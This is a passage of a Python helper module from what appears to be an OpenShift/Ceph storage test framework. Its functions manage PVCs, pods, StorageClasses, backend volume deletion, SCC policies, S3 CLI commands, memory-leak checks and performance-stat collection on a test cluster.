pv_name (str): Name of the PV for creation time measurement
Returns:
float: Deletion time for the PVC
"""
start = get_start_deletion_time(interface=interface, pv_name=pv_name)
end = get_end_deletion_time(interface=interface, pv_name=pv_name)
total = end - start
return total.total_seconds()
def pod_start_time(pod_obj):
"""
Function to measure time taken for container(s) to get into running state
by measuring the difference between container's start time (when container
went into running state) and started time (when container was actually
started)
Args:
pod_obj(obj): pod object to measure start time
Returns:
containers_start_time(dict):
Returns the name and start time of container(s) in a pod
"""
time_format = "%Y-%m-%dT%H:%M:%SZ"
containers_start_time = {}
start_time = pod_obj.data["status"]["startTime"]
start_time = datetime.datetime.strptime(start_time, time_format)
for container in range(len(pod_obj.data["status"]["containerStatuses"])):
started_time = pod_obj.data["status"]["containerStatuses"][container]["state"][
"running"
]["startedAt"]
started_time = datetime.datetime.strptime(started_time, time_format)
container_name = pod_obj.data["status"]["containerStatuses"][container]["name"]
container_start_time = (started_time - start_time).seconds
containers_start_time[container_name] = container_start_time
return containers_start_time
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind="StorageClass")
storage_classes = default_sc_obj.get().get("items")
storage_classes = [
sc for sc in storage_classes if "annotations" in sc.get("metadata")
]
return [
sc.get("metadata").get("name")
for sc in storage_classes
if sc.get("metadata")
.get("annotations")
.get("storageclass.kubernetes.io/is-default-class")
== "true"
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind="StorageClass")
if default_sc:
# Change the existing default Storageclass annotation to false
for sc in default_sc:
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"false"}}}\' '
)
patch_cmd = f"patch storageclass {sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = (
' \'{"metadata": {"annotations":'
'{"storageclass.kubernetes.io/is-default-class"'
':"true"}}}\' '
)
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def is_volume_present_in_backend(interface, image_uuid, pool_name=None):
"""
Check whether Image/Subvolume is present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is present and False if volume is not present
"""
cmd = ""
valid_error = []
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = [f"error opening image csi-vol-{image_uuid}"]
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = [
f"Subvolume 'csi-vol-{image_uuid}' not found",
f"subvolume 'csi-vol-{image_uuid}' does not exist",
]
cmd = (
f"ceph fs subvolume getpath {get_cephfs_name()}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format="json")
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} exists " f"in backend"
)
return True
except CommandFailed as ecf:
assert any([error in str(ecf) for error in valid_error]), (
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Volume corresponding to uuid {image_uuid} does not exist " f"in backend"
)
return False
def verify_volume_deleted_in_backend(
interface, image_uuid, pool_name=None, timeout=180
):
"""
Ensure that Image/Subvolume is deleted in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
timeout (int): Wait time for the volume to be deleted.
Returns:
bool: True if volume is deleted before timeout.
False if volume is not deleted.
"""
try:
for ret in TimeoutSampler(
timeout,
2,
is_volume_present_in_backend,
interface=interface,
image_uuid=image_uuid,
pool_name=pool_name,
):
if not ret:
break
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
except TimeoutExpiredError:
logger.error(
f"Volume corresponding to uuid {image_uuid} is not deleted " f"in backend"
)
# Log 'ceph progress' and 'ceph rbd task list' for debugging purpose
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd("ceph progress json", format=None)
ct_pod.exec_ceph_cmd("ceph rbd task list")
return False
def delete_volume_in_backend(img_uuid, pool_name=None):
"""
Delete an Image/Subvolume in the backend
Args:
img_uuid (str): Part of VolID which represents corresponding
image/subvolume in backend, eg:
``oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'``
Output is the CSI generated VolID and looks like:
``0001-000c-rook-cluster-0000000000000001-f301898c-a192-11e9-852a-1eeeb6975c91``
where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): The of the pool
Returns:
bool: True if image deleted successfully
False if:
Pool not found
image not found
image not deleted
"""
cmd = ""
valid_error = []
pool_cr = get_pool_cr(pool_name)
if pool_cr is not None:
if pool_cr["kind"] == "CephFilesystem":
interface = "CephFileSystem"
else:
interface = pool_cr["kind"]
logger.info(f"pool {pool_cr} kind is {interface}")
else:
logger.info(
f"Pool {pool_name} has no kind of "
f"{constants.CEPHBLOCKPOOL} "
f"or {constants.CEPHFILESYSTEM}"
)
return False
# Checking if image is present before trying to delete
image_present_results = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
# Incase image is present delete
if image_present_results:
if interface == constants.CEPHBLOCKPOOL:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = ["No such file or directory"]
cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
if interface == constants.CEPHFILESYSTEM:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = [
f"Subvolume 'csi-vol-{img_uuid}' not found",
f"subvolume 'csi-vol-{img_uuid}' does not exist",
]
cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
ct_pod = pod.get_ceph_tools_pod()
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
except CommandFailed as ecf:
if any([error in str(ecf) for error in valid_error]):
logger.info(
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
)
return False
verify_img_delete_result = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
if not verify_img_delete_result:
logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
return True
else:
logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
return False
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
service_account_data["metadata"]["name"] = create_unique_resource_name(
"sa", "serviceaccount"
)
service_account_data["metadata"]["namespace"] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
scc_name (str): SCC name
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=scc_name)
scc_users_list = scc_dict.get("users")
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc anyuid and privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
scc_list = [constants.ANYUID, constants.PRIVILEGED]
for scc in scc_list:
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user {scc} system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc anyuid and privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
scc_list = [constants.ANYUID, constants.PRIVILEGED]
for scc in scc_list:
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user {scc} system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
api: True if the call is for s3api, false if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = "api" if api else ""
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3{api} "
f"--endpoint={mcg_obj.s3_internal_endpoint} "
)
string_wrapper = '"'
else:
base_command = f"aws s3{api} --no-sign-request "
string_wrapper = ""
return f"{base_command}{cmd}{string_wrapper}"
def get_current_test_name():
"""
A function to return the current test name in a parsed manner
Returns:
str: The test name.
"""
return os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
"""
Creates directories on the specified pod.
Directories created under the respective test name directory.
Args:
pod_obj: A pod object on which to create directories
dir_names: A list of directories names to create.
Returns:
list: A list of all the full paths of the created directories
"""
full_dirs_path = []
test_name = get_current_test_name()
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {test_name}")
for cur_dir in dir_names:
current = f"{test_name}/{cur_dir}"
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {current}")
full_dirs_path.append(current)
return full_dirs_path
def wait_for_resource_count_change(
func_to_use,
previous_num,
namespace,
change_type="increase",
min_difference=1,
timeout=20,
interval=2,
**func_kwargs,
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample["items"])
if change_type == "increase":
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f"oc debug nodes/{node_name} -- df"
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
"""
Funtion to create multiple PVC in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): NUmber of pvc to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs,
sc_name=sc_obj.name,
namespace=namespace,
number_of_pvc=number_of_pvc,
access_mode=mode,
size=size,
)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, "Bound", 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list,
namespace,
interface,
pod_dict_path=None,
sa_name=None,
raw_block_pv=False,
dc_deployment=False,
node_selector=None,
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): Either RAW block or not
dc_deployment (bool): Either DC deployment or not
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Added 300 sec wait time since in scale test once the setup has more
# PODs time taken for the pod to be up will be based on resource available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(
executor.submit(
create_pod,
interface_type=interface,
pvc_name=pvc_obj.name,
do_reload=False,
namespace=namespace,
raw_block_pv=raw_block_pv,
pod_dict_path=pod_dict_path,
sa_name=sa_name,
dc_deployment=dc_deployment,
node_selector=node_selector,
)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
# In above pod creation not waiting for the pod to be created because of threads usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(
wait_for_resource_state, obj, "Running", timeout=wait_time
)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case Memory leak is
analyzed based on top output "RES" value of ceph-osd daemon, i.e.
``list[7]`` in code.
More Detail on Median value: For calculating memory leak require a constant
value, which should not be start or end of test, so calculating it by
getting memory for 180 sec before TC execution and take a median out of it.
Memory value could be different for each nodes, so identify constant value
for each node and update in median_dict
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
Usage::
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value form median_dict arg for respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__("g"):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__("m"):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__("g"):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__("m"):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN["username"]
if not password:
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["password_location"]
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
)
file_path = os.path.dirname(filename)
master_list = node.get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = "auth"
check_conf = "kubeconfig"
node_path = "/home/core/"
if check_auth not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}auth"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT, namespace=config.ENV_DATA.get("cluster_namespace")
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name("dummy", "osd")
osd_data["metadata"]["name"] = dummy_deployment
osd_containers = osd_data.get("spec").get("template").get("spec").get("containers")
# get osd container spec
original_osd_args = osd_containers[0].get("args")
osd_data["spec"]["template"]["spec"]["containers"][0]["args"] = []
osd_data["spec"]["template"]["spec"]["containers"][0]["command"] = [
"/bin/bash",
"-c",
"sleep infinity",
]
osd_file = tempfile.NamedTemporaryFile(
mode="w+", prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod, state=constants.STATUS_RUNNING, timeout=60
)
ceph_init_cmd = "/rook/tini" + " " + " ".join(original_osd_args)
try:
logger.info("Following command should expire after 7 seconds")
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info("Killing /rook/tini process")
try:
dummy_pod.exec_sh_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
Function is used to getting failure domain of pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format="json")
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
In case the of node failures scenarios, in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods,
previous_num=1,
namespace=config.ENV_DATA["cluster_namespace"],
timeout=120,
selector=constants.TOOL_APP_LABEL,
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
label_key (str): Label_key to be added in worker
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}",
out_yaml_format=False,
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
label_key (str): Label_key to be remove from worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, "w") as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = "-".join(resource_name.split("-")[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def modify_deployment_replica_count(deployment_name, replica_count):
"""
Function to modify deployment replica count,
i.e to scale up or down deployment
Args:
deployment_name (str): Name of deployment
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=deployment_name, params=params)
def collect_performance_stats(dir_name):
"""
Collect performance stats and saves them in file in json format.
dir_name (str): directory name to store stats.
Performance stats include:
IOPs and throughput percentage of cluster
CPU, memory consumption of each nodes
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN["log_dir"]),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats",
)
if not os.path.exists(log_dir_path):
logger.info(f"Creating directory {log_dir_path}")
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT["external_mode"]
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logging.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats["iops_percentage"] = iops_percentage
performance_stats["throughput_percentage"] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="master")
)
worker_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="worker")
)
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="master")
)
worker_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="worker")
)
performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
performance_stats[
"master_node_utilization_from_oc_describe"
] = master_node_utilization_from_oc_describe
performance_stats[
"worker_node_utilization_from_oc_describe"
] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, "performance")
with open(file_name, "w") as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
Validate pod oomkilled message are found on log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool : True if oomkill messages are not found on log.
False Otherwise.
Raises:
Assertion if failed to fetch logs
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace, container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert (
f'previous terminated container "{container}" in pod "{pod_name}" not found'
in str(ecf)
), "Failed to fetch logs"
return rc
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
"""
Validate given pod is in running state and not restarted or re-spinned
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = (
pod_obj.get("status").get("containerStatuses")[0].get("restartCount")
)
pod_state = pod_obj.get("status").get("phase")
if pod_state == "Running" and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(
f"Pod is in {pod_state} state and restart count of pod {restart_count}"
)
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
Arguments:
path(str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, "rb") as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = (
OCP(
kind="secret",
namespace="openshift-ingress-operator",
resource_name="router-ca",
)
.get()
.get("data")
.get("tls.crt")
)
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode("utf-8")
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
bool: True if storagecluster is running on external mode False otherwise
"""
storage_cluster = (
OCP(kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"])
.get()
.get("items")[0]
)
return bool(
storage_cluster.get("spec", {}).get("externalStorage", {}).get("enable", False)
)
def get_pv_size(storageclass=None):
"""
Get Pv size from requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
